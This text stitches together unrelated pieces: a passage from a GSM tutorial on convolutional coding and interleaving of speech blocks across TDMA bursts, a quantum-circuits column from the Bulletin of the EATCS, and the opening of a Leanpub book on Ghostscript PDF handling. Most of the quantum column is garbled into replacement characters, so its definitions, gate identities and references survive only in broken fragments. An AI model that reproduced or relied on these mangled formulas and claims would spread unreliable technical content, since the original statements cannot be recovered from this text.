"protected" bits are inputted into a complex convolutional code that outputs 2 bits for  
every bit that enters it. The second bit that is produced is known as a redundancy bit. The  
number of class I bits is doubled from 189 to 378. 
This coding uses 5 consecutive bits to calculate the redundancy bit, this is why there are 4  
bits added to the class I bits when the cyclic code was calculated. When the last data bit  
enters the register, it uses the remaining four bits to calculate the redundancy bit for the  
last data bit. The class II bits are not run through the convolutional code. After  
convolutional coding, the audio block is 456 bits 
Convolutional Coding
[Back to Top] 
Reordering, Partitioning, and Interleaving
Now, one problem remains. All of this error detection and error correction coding will  
not do any good if the entire 456-bit block is lost or garbled. In order to alleviate this, the  
bits are reordered and partioned onto eight separate sub-blocks. If one sub-block is lost  
then only one-eighth of the data for each audio block is lost and those bits can be  
recovered using the convolutional code on the receiving end. This is known as  
interleaving. 
Each 456-bit block is reordered and partitioned into 8 sub-blocks of 57 bits each. Click 
Here to see the ordering sequence. 
These eight 57-bit sub-blocks are then interleaved onto 8 separate bursts. As you  
remember from the TDMA Tutorial, each burst is composed of two 57-bit data blocks,  
for a total data payload of 114 bits. 
The first four sub-blocks (0 through 3) are mapped onto the even bits of four consecutive  
bursts. The last four sub-blocks (4 through 7) are mapped onto the odd bits of the next 4  
consecutive bursts. So, the entire block is spread out across 8 separate bursts. 
Taking a look at the diagram below we see three 456-bit blocks, labeled A, B, and C.  
Each block is sub-divided into eight sub-blocks numbered 0-7. Let's take a look at Block  
B. We can see that each sub-block is mapped to a burst on a single time-slot. Block B is  
mapped onto 8 separate bursts or time-slots. For illustrative purposes, the time-slots are  
labeled S through Z. 
Let's expand time-slot V for a close-up view. We can see how the bits are mapped onto a  
burst. The bits from Block B, sub-block 3 (B3) are mapped onto the even numbered bits  
of the burst (bits 0,2,4....108,110,112). You will also notice that the odd bits are being  
mapped from data from block A, sub-block 7 (bits 1,3,5....109,111,113). Each burst  
contains 57 bits of data from two separate 456-bit blocks. This process is known as  
interleaving. 
Reordering, Partitioning, and Interleaving
In the following diagram, we examine time-slot W. We see that bits from B4 are mapped  
onto the odd-number bits (bits 1,3,5....109,111,113) and we would see bits from C1  
mapped onto the even number bits (bits 0,2,4....108,110,112). This process continues  
indefinitely as data is transmitted. Time-slots W, X, Y, and Z would all be mapped  
identically. The next time-slot would have data from Block C and Block D mapped onto  
it. This process continues for as long as there is data being generated. 
Interleaving
The process of interleaving effectively distributes a single 456 bit audio block over 8  
separate bursts. If one burst is lost, only 1/8 of the data is lost, and the missing bits can be  
recovered using the convolutional code. 
Now, you might notice that the data it takes to represent a 20ms (456-bits) audio block is  
spread out across 8 timeslots. If you remember that each TDMA frame is approximately  
4.615ms, we can determine that it takes about 37ms to transmit one single 456-bit block.  
It seems like transmitting 20ms worth of audio over a period of 37ms would not work.  
However, this is not what is truly happening. If you look at a series of blocks as they are  
mapped onto time-slots you will notice that one sub-block ends every four time-slots,  
which is approximately 18ms. The only effect this has is that the audio stream is  
effectively delayed by 20ms, which is truly negligible. 
In the diagram below, we can see how this works. The diagram shows 16 bursts.  
Remember that a burst occurs on a single time-slot and the the duration of a time-slot is  
577 μs. Eight time-slots make up a TDMA frame, which is 4.615ms. Since a single  
resource is only given one time-slot in which to transmit, we only get to transmit once  
every TDMA frame. Therefore, we only get to transmit one burst every 4.615ms. 
* If this is not clear, please review the TDMA Tutorial. 
During each time-slot, a burst is transmitted that carries data from two different 456-bit  
blocks. In the diagram below, Burst 1 carries data from A and B, burst 5 has B and C,  
burst 9 has C and D, etc. Looking at the diagram, we can see that it does take  
approximately 37ms for Block B to transmit all of its data, (bursts 1-8). However, in  
bursts 5-8, data from block C is also being transmitted. Once block B has finished  
transmitting all of its data (burst 8), block C has already transmitted half of its data and  
only requires 4 more bursts to complete its data. 
Block A completes transmitting its data at the end of the fourth burst. Block B finishes in  
the eighth, block C, in the 12th, and block D in the 16th. Viewing it this way shows us  
that every fourth burst comepletes the data for one block, which takes approximately  
18ms. 
The following diagram illustrates the entire process, from audio sampling to partitioning  
and interleaving. 
Data and signalling messages will be covered in a future tutorial. 
Analog/Digital Conversion      Speech Coding     Block Coding     Convolutional Coding     Reordering & 
Partioning     
Introduction     Architecture     TDMA     Logical Channels     Authentication & Encryption      Timing 
Advances     Speech Encoding     GSM Events 
Updates     Bulletin Board     Sitemap     Contact Me 
Home 
sd

The Bulletin of the EATCS
53�������������
��������������������������������������������������������������������
���������������������������������������������������������������������integer factorization������������������������������������������������
������������������������������������������������������������������������ Pell’s equation����������������� unit group and class group���������
��������������������� hidden shift������������������������������ linear
systems���������������� group order and membership����� group isomorphism
�������� knot invariants�������������������������������������������
��������������������������
����������������������������������� unitary evolution��������������
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
�����������������������������������������������������������������
�������������������������������������������������������������������
������������������������������������������������������������ Clifford
���������������������������������������������������������������������
���������������������
���������������������������������� universal quantum basis������
��������������������������������������������������������������������������������������� Toffoli���������������������������� measurement
and classical feedback�������������������������������������������������
��������������������������������������������������������
���������������������
���������� n�����������,��n����������������������������������������
���� f���,��n���,��m������ m������������������������������������
�����������������������������������������������������������������logic gates�������������������������������������������� one����������
�����������������������������������������������������������������������������������������������������������������������������������
�������������� logic circuits�
BEATCS no 110 THE EA TCS COLUMNS
54���������������������� reversible���������������������������������
���� f����������������������������������������������������������������
x�������������������������������������������������� f�x�������������
����������������������������������������� f��������� reversible Boolean
function���� n�����������������������,��n���,��n���������������,��n
�����������n����������������������������������������������������
��������������n������������������������������������������������������
���������������������������������������������� S�n�
�������������������������� a,b����a�b�������� a,b����a�b���
���������������������������������������������������������������������
������������������������������,�����,�������������������������������
n��������������� In������������������������������������������ I�
������������������������������������������������������������������
����������������������������������������������������������������,��
����,��������������������� a,b���a,a�b����������������
������������������������������������������������������������������������������������������� control����������������������������������������
���������������������������� target������������������ a���b�������
����������������� a�����������������������
���������������������������������������������������� n�n
����������������������������,��
n���,��n�
�������������� i�,i��,..., n����������������������������� i���
����������������������� i������������ i��������������������� x�,..., xn�����
���� xi��
������������ i,j�,��i,j�n,i/nequalj����������
����� i,j������������ j��������������������� x�,..., xn����� xi�xj�
���������������� k�k��������������� f���,��k���,��k����� n�k�
���� multi-index��i�,..., ik,��il�n,l��,... k����������� extension
f������,��n���,��n��n��������������������� f�xi�,..., xik���yi�,..., yik�
���� f����x�,... xn��replace��x�,... xn�,xil,yil,l��,..., k��
������������������������������������������������������������
�������������������������������������������������������������������
�����������������������������������������������������������������������������������������
��������������������������������������������������
���������
1. NOT�i�NOT�i��I.
2. CNOT�i,j�CNOT�i,j��I.
The Bulletin of the EATCS
55���������
1. We introduce the two-bit SWAP gate that swaps the two logical input bits:
SWAP�CNOT��,��CNOT��,��CNOT��,��
.
2. V erify that for n��,��i,j�n,i/nequalj,
SWAP�i,j��CNOT�i,j�CNOT�j,i�CNOT�i,j�.
3. V erify that SWAP�i,j��SWAP�j,i�and SWAP�i,j�SWAP�i,j��I.
����������������������������������������������������������������
��������������������������������������
���������
1. NOT�j��SWAP�i,j�NOT�i�SWAP�i,j�.
2. By direct verification on the i ,j,k,l bits,
CNOT�k,l��SWAP�i,k�SWAP�j,l�CNOT�i,j�SWAP�j,l�SWAP�i,k�.
���������������������������������������������������������������
�������������������������������������������������������������������������������������
�������������������������������������� n����������� circuit��������
����������������������������������������������������������������n����������
��������� Fo r n��,S W A P��,��SWAP��,��is a circuit implementing a cyclic
permutation of bits in a 3-bit vector:�x
�,x�,x����x�,x�,x��.
�����������������������������������������������������������
������������������������������������������������������������������
����������������������������������
�������������������������������������������������������������
���������������������������� greater��������� f���,��k���,��k���
�������������������������� n>k��������������������� f��,..., k������
�������� f����� n����������������� n����������� c����������������������
������������������� f��,..., k����������� circuit c implements f using n�k
ancillary bits�
BEATCS no 110 THE EA TCS COLUMNS
5 6����������������������������������������������������������������
��������������������������������������������������������������������������������������������������������������������������������,��
n��
����������������������������������������������������������������������
����������������������������������������������� f���,��n���,��n
��������� linear transformation f�x�y��f�x��f�y�������������������
���������������������
��������� A reversible Boolean function can be represented by a circuit con-
structed entirely of CNOTs if and only if the function performs a reversible linear
transformation.
����������������������������������������������������������������
����� i,j����������������������������������������������������������
����������������������������������������������������������������������
���������������������������������������������������������������������
�����
��������� None of the extensions of the NOT gate are linear transformations.
This can be seen from the fact that when an extension of the NOT gate is applied
to the zero bit vector the result is non-zero. Therefore the NOT gate cannot be
implemented by a CNOT circuit using any number of ancillary bits.
��������� Consider a controlled-CNOT gate, CCNOT, which is a ternary gate
with the property CCNOT�x,y,z���x,y,�x�y��z�. This gate is also called a
������gate after its inventor Tommaso To ffoli [22]. To ffoli gate is not a linear
transformation (e.g., compare CCNOT���,�,�����,�,���and CCNOT��,�,���
CCNOT��,�,��). Therefore it cannot be implemented as a CNOT circuit.
������������������������������������������������������������������
�����������������������������������������������������������������������������������������������������������������������������������
�����������������������������������������������������������������������
�������������������������������������������������������������������
����������� A composition of various extensions of the CNOT, NOT, and To ffoli
gates is called a CNT�������� .
��������� Any reversible Boolean function can be implemented by a CNT -
circuit using at most one ancillary bit.
���������� Consider the 4-bit reversible boolean function f defined by the fol-
lowing rules:
f��,�,�,�����,�,�,��,
The Bulletin of the EATCS
5 7f��,�,�,�����,�,�,��,
f��,�,�,�����,�,�,��,
f��,�,�,�����,�,�,��,
and f is identity on the remaining 12 bit vectors of��,���.
Show that the function f cannot be implemented with a CNT -circuit using no
ancillary bits.
Hint���������������������������������������������������� CNT�
����������������������������������������������������������������������������������������������������������������� f��������������������
�������������������������������,��
��
�����������������������������
������������������������������������������������������������������
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
����������������
��������������������������������������������������������� qubit������
���������������������������������������������������������������������
s���,������������������ψ������������������ superposition��������������
�ψ��α����β���,���
����������,������������������������������������������������������������
��������,��T���������,��T����������������� amplitudesα���β���
����������������������������������������������������α����β���������
measurement������������������ψ����������������������������������������
��������α�����β����������������
��������� n����������������������n�������������������������������
���������������������������������������������������������������������� n
��������������n��������������������������������������������������������
�����n���������
�ψ���n��∑
i��αi�i�,���
BEATCS no 110 THE EA TCS COLUMNS
5 8�����αi�������������������������������������������∑
i�αi�������� i��
�������������������������������� i�������������������������������������
�������������������������������������������������������������������
��������,�,�,�,�,�,�,��T���������������������������������������������
���������������������������������������������������������������������������������������������������������������������������
���������
1. The two-qubit state��/��������i�����i����������is a product of the
single-qubit state��/�
�������i����on the first qubit and the��/�
�������
i����state on the second qubit.
2. The two-qubit state��/�
�������������is not a product of two individual
single-qubit states
�������������������������������������������������� entanglement�����
�������������������������������������������������������������������������������������������������������� entangled��������������������������
����������������������������������������������������������������������������������������������
����������������������������������������������������������������
�������������������������������������� phase factor��������� e
iθ,θ�R�
����������������������������� θ�����eiφ����θ������������φ<�π,��
θ�π/����������������� θ���φ���������������������������������
����������������������������������������������������������������������
��������������������������������������������������������
���������������������������������������������������������������
���������������������������������������������������������������������������������������������������������������������������������������
����������������������������������������������������������������������C
��C�������������������������������α,β�,�γ,δ���αγ��βδ��������
��������������������������������������������������� unitary operators
������������
������������������������������������� unitary�������������������
�������������������������������������������� reversible�����������������
�������������������������� gates������������������������ n�������������
��������n��n����������������������� n�������������������
�������������������������������������� U��������������������������
�������������� U�CN�CN������������
U��CN�CN
The Bulletin of the EATCS
5 9
������������������������������������������������������������������������
���������������������������
������������������������������������������������������������������
�������� U�
����������� A linear operator U�CN�CNis������� if UU��I (or in other
words U�is the inverse of U).
�������������������������������������������������������������������
�������� A�C��C�������������������������������������������������������
�����������������������������������������������������������������
������������������������������������������������������������������
���������������������������������������������������������������������
�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� e
iθ���������������������������������������
BEATCS no 110 THE EA TCS COLUMNS
60������������������������������������������������
�����������������������������
��������������������� n���������������������������������������������
�������� n���������������������������� f��������������������� n����������
������������ Uf�������������������������������������s�����������
Uf��s����f�s��.
���������������������� Uf������ f������������������������������ classical
unitary gate������������������������������� U�������������������������
�������������������������� f��� g���������������� Uf�g�Uf�Ug�
�������������������������� CNT��������������������������������������
X�U������������������������������������
[��
��]
.
U��������������������������������X���������������������������
⎡⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎣����
������������⎤⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎦.
���������� U����
��,���������������X���,����������������
⎡⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎣����
������������⎤⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎦
����������������� U
f�g��������������� U���������
⎡⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎣����
��������
����⎤⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎦.
U������������������������������
��X��������������������������
The Bulletin of the EATCS
61����������������⎡⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎢⎣��������
��������������������������������������������������������⎤⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎥⎦.
��������������������������������������������������������������������
����������������������������� n������������� G���G������ n������������
��������������������������������������
��G���s
�...sn����s�...sn�,
��G���s�...sn�����G�s�...sn�.
�������������������������������������������������������������������
������������������������������������������������������������������������������������������������������������������������������� U
C�f����Uf�
������������������������������� f�
��������������������������������������������� Hadamard���� H������
����������������������������������������������������������
H������/�
�����������,
H������/�
�����������,
������������������������������
H���
�[��
���]
.���
���������n������������������������������������������������������ n
����������������������������������������������������� n�����������������
����������������������������������������������������������
�������������
��������������� Pauli group����������������������������������������������
������������ Pauli gates�
I�UI�[��
��]
,X�U����[��
��]
,Y�[��i
i�]
,Z�[��
���]
.
BEATCS no 110 THE EA TCS COLUMNS
62��������������������������� X��� I��������������������� X��Y��Z��I�
�����������������������������������������������������������������
������������������������������ z���I,�iI����������eiπ����i�e�iπ/�
����������������������������� z����������������������������������������
��������������������������������������������������������������������������I,X,Y,Z�
�������������������������������������������������������������������
�������������������������������������������������������������������������X,Y,Z�������������������� π����������x,y,z�������������������������
��������������������������������������������������������������������������������������������������������� A�
���������� (1) Prove that given a single-qubit unitary A and P��X,Y,Z�,
APA
��aPX�bPY�cPZ where a P,bP,cPare uniquely defined by���� coef-
ficients.
����� Due to the unitary condition A A��I , matrix A is defined up to a
phase factor by its first row. More specifically, A�eiα�B, whereα�Rand B�
��u,v�,��v�,u���. It is easy to see that B�Re�u�I�i�Im�v�X�Re�v�Y�Im�u�Z�.
(2) Prove that in the context of (1)
⎡⎢⎢⎢⎢⎢⎢⎢⎢⎣a
XaYaZ
bXbYbZ
cXcYcZ⎤⎥⎥⎥⎥⎥⎥⎥⎥⎦
is a special orthogonal matrix.
(3) Prove that the matrix in (2) defines the rotation of the Bloch sphere corre-
sponding to A.
������������������������������������������������I,X,Y,Z������������
�������������������������������������������������������������������
�������������������������������������� n�k�m����������������������
����������������� n�������������������������������� C
�n���������������
������������� C�k�C�m�������������������������������������������������
��������������� C�k���C�m���������������a�,..., a�k��������������������
����b�,..., b�m���������������������������������������� aj,bl�,��j�
�k,��l��m��������������������������������������������k����m���n�
������������������������������������������������������������������������� a
j,bl��� aj�bl�������� ajbl�
����������� Given two linear operators A�CM�CMand B�CN�CN,
M,N�N, the������������� of A and B is the linear operator A�B�CM�CN�
CM�CNuniquely defined by the property
�A�B��a�b���Aa���Bb�.
The Bulletin of the EATCS
63��������������������������������������������������������� n�����������
�����C�n������������������ n������������������������������ C����
������������������������������ Aj�C��C�,j��,..., n�����������������
A������ An�����������������������������������������������
�A������ An���ψ��...�ψn���A���ψ���...An��ψn��.
��A��...�An�A������������������������������������� A�n�
��������������������������������������������������������������
��������� A,C�CM�CM��� B,D�CN�CN�
�A�C���B�D���A�B���C�D�.
����������������������� n-qubit Pauli group P n�����������������
������������������������������P��...�Pn�Pi��I,X,Y,Z�,i��,..., n��
��������������������������������������n����������������� n�Pn����
��������������������������� In�I�n���������������������������In,�iIn��
����������������������������������������������������������������
������������������������������������ Heisenberg�����������������������
�������������������������������������������������������������������������������������������������������������������������
������ ff��������
���������������� U��n������ n����������������������������� Pn�U��n���
������������������������������������������������������ U��n��������
������������������������������������������������������������������
����������������
����������������������������������������������������� preserves���
������������������������������������������������������������������
���������������������������������������������������������������������������������������������������������� normalizer����������������
���������������������������������������������������� U��
n�����������
����������������������������� eiθI,θ�R�������������������������� U��n�
������������������������������������� Pn������������������������������
����������������������������������������������������������� Pn�����
��������������� Pn�
�������� Hadamard���� H���������������������������� H����������
�����������������
H������/�
�����������,
H������/�
�����������.
BEATCS no 110 THE EA TCS COLUMNS
64����������������� H��I�HXH�Z�HYH�����Y�HZH�X����������
H������������������������������������������������������������ H���
���������������������������������������������������������������������������������������������������������������� I�H,H�I��� H�H�����
��������������������������������������
����������������������������������������������� phase gate S������
��
S��������S����i���.
���������������������������������� S����������������������������������
��������� S
��Z��S��I�������������������������������������������
������� S��S��
��������������������
SX S��Y�SYS������X�SZ S��Z.
���� S������������������������������������������������������������
��������������������������������������� S�H,S�S��� H�S��������
����������������������������������
��������������������������������������X����������������������
������������������������������������������P�,P��X,Y,Z,����I,�iI��
�������������������������������������������������������������������������������������
�H�H����X���H�H����X���,��.
��������� The normalizer of the n-qubit Pauli group in U��
n�is generated by
the center z�U��n��(the subgroup of scalar unitaries), tensor products of I ,H,S
operators, and various CNOT operators��X��j,l�,��j<l�n.
�������������������������������������������������������
����������� The������������ is the group of unitary operators, generated by
���H��� S���������������������
������������������� I,H,S��������X��j,l�,��j<l�n����� n������
����� n>��
���������������������������������������������������������������
�������������������������������������������������������� Clifford group��
��������������������������������������� is�������������������������������������
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������
�������������������� PU��
n�������������������
The Bulletin of the EATCS
65���������������������������������������������������������������������������
��������������������������������������������������������������������
������������������������
�������������������������������������������������������������
������������������������������������������� n���������������������
�n���n��∏n
j���j����������������������������������������������������
���������������������������������������������������������������������
������������������������������������������������������������������������������������������������������
�����������������������
���������������������������������������������������������������
��������������������������������������������������������������������
������������������������������ quantum measurement��� classical feedback
�����������
����������������������������������
������������������������������������������������������������������������������������������������������������ M�C
N�CN�������� Her-
mitian��M�M����������������������������������������������������
��������������� M������������������������������������������������������
M��I�������������������������������������������������������������
����������������������������������������������� S�����
���m�,..., ml��������������������������������������������������� M�
��������������������������������
M�∑
jmjPr j,
����� Pr j��������������������������������� M������������������������
����� mj����������������������������������������������������������
measurement������������� M����������������ψ��������������������
������������� M����������������������������������������������������
�����
��������������������������������� pj�����������������������������
mj������������������������������������������������ Pr j�ψ���������
�������ψ������ j��������������������������������������ψ�Pr j�ψ����
�����������������������������������ψ������������������������������
BEATCS no 110 THE EA TCS COLUMNS
66��������������������������������������������������������������������
������������������������������
������� measurement postulate���������������������������� pj��pj�
�ψ�Pr j�ψ�������������������∑
jpj��ψ��ψ����
�������������� state reduction����������������������� if the eigenvalue
mjis observed in measuring the operator M, the quantum state�ψ�is changed
(‘collapsed’) into Pr j�ψ�post-measurement�
��������������������������������������� M�������������������
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
��������� The simplest scenario is measuring the Pauli operator Z on the
single-qubit stateα����β���. The eigenvalues of Z are��and��and the prob-
abilities of observing each one are�α�
�and�β��respectively. Post-measurement
the state collapses to either basis state���or to basis state���. The standard no-
tation for this measurement procedure is M Z. In multi-qubit case we will use the
notation M Z�i�for the Z-measurement applied to ithqubit only.
���������������������������������������������������������������
�������������������������������������������������������� classical con-
trol bits�������������������������������������������������������������
�classically controlled gate���������������� G�U�N��������������������
�����������
BC�G�����,���CN�����,���CN�
����������
BC�G����,v�����,v��BC�G����,v�����,Gv�.
������������������ ff���������������������
����������������������������������������������������������������
���������������������������������������������������������������������
�������������������������������������������������������������������
��������������������������
���������������������������ψ����������������������������������������
�����������������������������������������������������������������������
���������������������������ψ�������������������������������������������
�����������������ψ��
���������������� H�H�I���������������������������������������
������������������������������������������ I�I�S�����������������
���������������������������������������� S������������������������
The Bulletin of the EATCS
6 7�������������� U��H�H�I����X��I�I�S����X��H�H�I��������������
���������������������������������ψ����������� MZ���������������������
������������
������������������������X����������������������������������
����������������������� U�������ψ��a����b���,�a����b�������������
�������������������
U�����ψ����/������i�a����������i�b������
���i�a���������i�b���������i�a������
���i�b�������i���a�������i���b������.
������������������������� IIZ�I�I�Z���������������������
��������������������������� Z�����������������������������������������
������������������� BC�IIZ��MZ����MZ���,������������������������������
��� IIZ���� unless M Z���������� MZ������������������������������
BC�IIZ��MZ����MZ���,���U����������ψ�������
������������������������������������ MZ���������� MZ�����������
U�����ψ������������������������������� Z�I�I���������������������
I�Z�I��������������������������������������������������������������
������������������������������������������������ U�����ψ����������
����������������������������������������������i�a����������i�b��������
�������������������� a�����������i�/���i��b������a����������i
��b������
��������������������������������������������������������������
����������� V����,��,��,���i
������������������������������������������
��������������������� U�����ψ��������������������������������������
����������������������������� Z���������������������������������������
�������� BC�IIZ��MZ����MZ���,�����������
������������������������������������������������������������������
�������������������������������������������������������������� p���
����i�/����a��������i�/����b����/���a����b�����/�����������������������
�������������������������������������������������� V�����������������
�������������������������������������������������������������
��������������������������
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
�������������������������������������������������������������������
�����������������������������������������������������������������
BEATCS no 110 THE EA TCS COLUMNS
6 8���������������������������������������������������������������������
�������������������������������������������������������������
��������� The result of applying a sequence of Cli fford gates followed by a
Pauli measurement to the input state��������Ncan be simulated in polynomial
time on a probabilistic classical computer .
��������������������������������������������������������������������
�������������������������������������������������������������������
��������������������������������������������������������������������������
���������������������������������������������������������������
������������������������������������������������������������������������
�
��X������������������������������������������������������X��X�I�
I����X���������������������������������������� H-Toffoli�����������������
���������������������������������������������������� H�N����������
�������������������� N����������������������������� ,�������������
��������������������������,����,�������������������������������������
���������������������������������������������������������������������
���������������� arbitrary��������������������������������������������
Uf������ f�����������������������������������������������������������
������������������,����,�������������������������������
�����������������������������������������������������������
������������������������������������������������������������������������������������������������������������������ H
�NUf������ f������������
������������������������������������������������������������������
������ interleave�������������������������������������������������������
�������������������������������������������������������������������������������������������������������������������������������
����������������������
����������������������������������������������������������������������
�������������������������������������������������������������������
��������������������������������� dense subgroup�����������������
U�N��
����������� A subgroup G�U�N�is everywhere����� if for every u�U�N�
and for everyε>�there exists a g ε�G such that the distance between g εand u
is less thanε.
The Bulletin of the EATCS
6 9�������������������������������������������������������������
��������������������������������������������������������������������������������������������������� trace distance������������� U�N���
dist�U,V��√
�N��tr�UV����/N,
����� tr������������������������������� tr�IN��N���������������������
���������������������������������������������������������������������
���������������������������������������������
Concept:����������������������������� pure universal quantum basis
��n���������������������������������������������������� U��n��
���������������������������������������������������������������������
������������������������������������������������������������������������������������������������������ state preparation�measurement���� classical
feedback������������������������������������������������� ancillary
qubits������������������������������������������������������������
�������������������������������������������������������������������
���������������������������������������������������������������������
��������������������������������������������������������������������������������
����������� We say that a k-qubit unitary u�U��
k�is approximated to precision
ε>�by a circuit c�U��n�, where n�k,����� n�k��������������� if either
In�k�u is at a distance less than εfrom c or u is at a distance less than εfrom a
projection of c onto U��k�.
����������������������� projection������������������������� U��n��
U��k��������������������������������������
���������������������������������������������������������������
�����������������������������������������������������������������������
������������������������������������������������������
��������� The circuit group generated by CNOT and all single-qubit unitary
operators is purely universal in the multi-qubit space.
������������������������������������������������������������������
G����������������������������������������������������������������������
������������������������� any gate G has this property, unless the eigenvalues
of G�are���
����������������������������������� T����,��,��,�
i���������������
�������������������������������������� S�T����������������������
��i�������� T������������������� π/�-gate������������������������
BEATCS no 110 THE EA TCS COLUMNS
70�����������������������������������������H,S������������������������
�������������������H,T�����������������������������������������������
�������������������������������� U�������������������������� S�T����
��������������������������������������������������������������T������
����������������������������������������������������������������������������������������������������������������������������
����������������������������������������������������������������
��������������������������������������������������� T�����������������
������������������������������������������������������������������������������������ T���������������������� magic state distillation protocol����
����������������������������������������������������������������������
������������������������������������������������������������������������������ T�����������������������������������������������������������
�����������������������������������������������������������������������
�����
���������������������������������������������������������������
��������������������������������������������������������������������������������������������������������
��X��������������������
���������������������������������������������������������������
������������������������������������������������� one��������������
������������������������������������������������������������������������������������������������������������������������������������������
������������������������
��������������������������������������������������������������������
����������������������������������������������������������������V����
����������� V����,��,��,
���i
�������������������������������������������
���������������������� T��� V��������������������������������������
����������������������������������������������������������������������
���������������� ε�����������V����������������������������������/ε�
���������������� V�����
�������������������������������������������������� V��������������
���������������������������������������������������������������������
���������������� /��∑
kk��/��k����/���������������������������������
������������������������������������� ε�������������������� /��������/ε�
���������������������������
������������������������������������������������������������������
������������������������������������������������������������ CNOT�
��������������������������������������������������������������������
����������������������������������������������������������������������������������������������������������������
��������������������������������������������������������������
The Bulletin of the EATCS
71
�������������������� π/����� V�������������������������������������
�������������� Z����������������� π/���� cos�����/������������������������
����������������������������� π��
���������������������������������T���������������������������������
�������������������������������������������������������������������
����� T�����������������������������������������������������������
������������������������������������������������������������������������
��������������������������������������������������������������������������������������������������������T���������
�����������������
�����������������������������������������������������������������������
��������������������������������������������������������������������������������������������������������������������������������������
BEATCS no 110 THE EA TCS COLUMNS
72����������������������������������� quantum compilation�������������
����������������������������������������������������������
�������������������������������������������������������������������
�����������������������������������������������������������������
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������ ε���������������������������
������� O����
�.����/ε���������������������������������������������������
�������������������������������������������������������������������
O������/ε����������������������������������������������������������
������������������������������������������������
����������������������������� efficient����������������������������
������������������������ O������/ε�����������������������������������
��������������������������������������������������������������������
�������������������������������������������������������������������������������������������������������������������������������������������
��������������������������������������������������������������������
������������������������������������������������������������������
�������������
�������������������������������������������������������������
��������������������������������������������������������������������������������������������������������������������������������������������������������������������
�������������������������������������������������������������������
������������������������
������������������������������������������������������������������
��������������������������������������������������������������������������������������
��������������������������������������������������������������������
���������������������������������������������������������������������������������������������������������������������������������������
��������/ε�����������������������������������������������������������
�����������������������������������������������������������������
������������������
The Bulletin of the EATCS
73����������������
�����������������������������������������������������������������
�������������������������
����������
����������������������������������������������������������������������� S��
������� Comm. Pure and Appl. Math., 34, 149–186, and 40, 401–420�����������
�������������������������������������������������������������������� IBM
Journal of Research and Development, 5, 183–191������
���������������������������������������������������������� Electronics
Magazine, p.4������
����������������������������������� Penguin Books������
������������������������������������������������� IBM Journal of Research and
Development, vol. 17, no. 6, 525–532������
�������������������������������������������������������������
������������������������������������������������������������������������
����������������������������������������������������������������� Phys. Rev.
A, 70, 052328����������������������������������
���������������������������������������������������������������������
�������������������������������������������������������������
���������������������������������
��������������������������������������������������������������������
�����������������������������������������������������������������������
������������
������������������������������������������������������������������������������
������������������� SIAM Journal on Computing, 26(5):1484-1509������
�����������������������������
���������������������������������������������������������������������������
������������������ Proceedings of the 34th ACM Symposium on Theory of Com-
puting������
�������������������������������������������������������������������������
�������������� Proceedings of the 37th ACM Symposium on Theory of Comput-
ing�����
�������������������������������������������������������������������������
�������������������������� Proceedings of the 37th Symposium on the Theory
of Computing, pg. 475-480������
BEATCS no 110 THE EA TCS COLUMNS
74���������������������������������������������������������������������
����� SIAM Journal on Computing, 36(3):763-778������������������������
����������
�������������������������������������������������������������������������
���������� Physical Review Letters 15(103):150502����������������������������
������������������������������������������������� Proceedings of the 33rd
ACM Symposium on Theory of Computing, pages 60-67������������������������
�����������
�����������������������������������������������������������������������
����������������������������������������������������������
��������������������������������������������������������������������
����������������� Communications in Mathematical Physics, 227:587-603������
����������������������������������������������������������������������
��������������� Comm. Math. Phys. 227(3):605-622������������������������
�����������
������������������������������������������������������������������ Cambridge
University Press, Ltd������
��������������������������������������������������������������������������
IEEE Trans. CAD 22(6):710 - 722������
����������������������������������������� ICALP: 632-644�����
��������������������������������������������������������������� Cam-
bridge University Press������
�������������������������������������������������������������������������
���������������������� Quant Inf Comp 8:106 - 126������
������������������������������������������������������� Physical Review A
52(5):3457-3467������
������������������������������������������������������������ Information
Processing Letters, 75(3):101-107������
������������������������������������������������������������������������
��������� Physical Review Letters 109:190501����������������������������
�����������������������������������������������������������������������
������������������������������������������������������������������������
����������������������������
���������������������������������������������������������������������������
��������������������������������������������������������������������
�������������������������������������������������������������������
���������������������
The Bulletin of the EATCS
75��������������������������������������������������������������������
���������������������
�����������������������������������������������������������������
���������������������� Physical Review A 71:022316�����������
����������������������������
����������������������������������������������������������������������
�����������������������������������������������
��������������������������������������������������������������������������
���������������������
�������������������������������������������������������������������������
���� V�����������������������������������
��������������������������������������������������
��������������������������������������������������������������������
���������������������������������������������������������������� Russ. Math.
Surv., 52(6):1191-1249������
��������������������������������������������������������
��������������������������������������������������������������������
������ J. Math. Phys. 43:4445����������������������������������������
����������������������������������������������������������������������������
����
��������������������������������������������������������������� Phys. Rev. A
87:022328���������������������������������
�������������������������������������������������������������
��������������������
�������������������������������������������������������PDF-KungFoo with
Ghostscript & Co.
100 Tips and Tricks for Clever PDF Creation and Handling
Kurt Pfeifle
PDF-KungFoo with Ghostscript & Co.
100 Tips and Tricks for Clever PDF Creation and Handling
KurtPfeifle
Thisbookisforsaleat http://leanpub.com/pdfkungfoo
Thisversionwaspublishedon2014-04-13
ThisisaLeanpubbook.LeanpubempowersauthorsandpublisherswiththeLeanPublishingprocess.
LeanPublishing istheactofpublishinganin-progressebookusinglightweighttoolsandmany
iterationstogetreaderfeedback,pivotuntilyouhavetherightbookandbuildtractiononceyoudo.
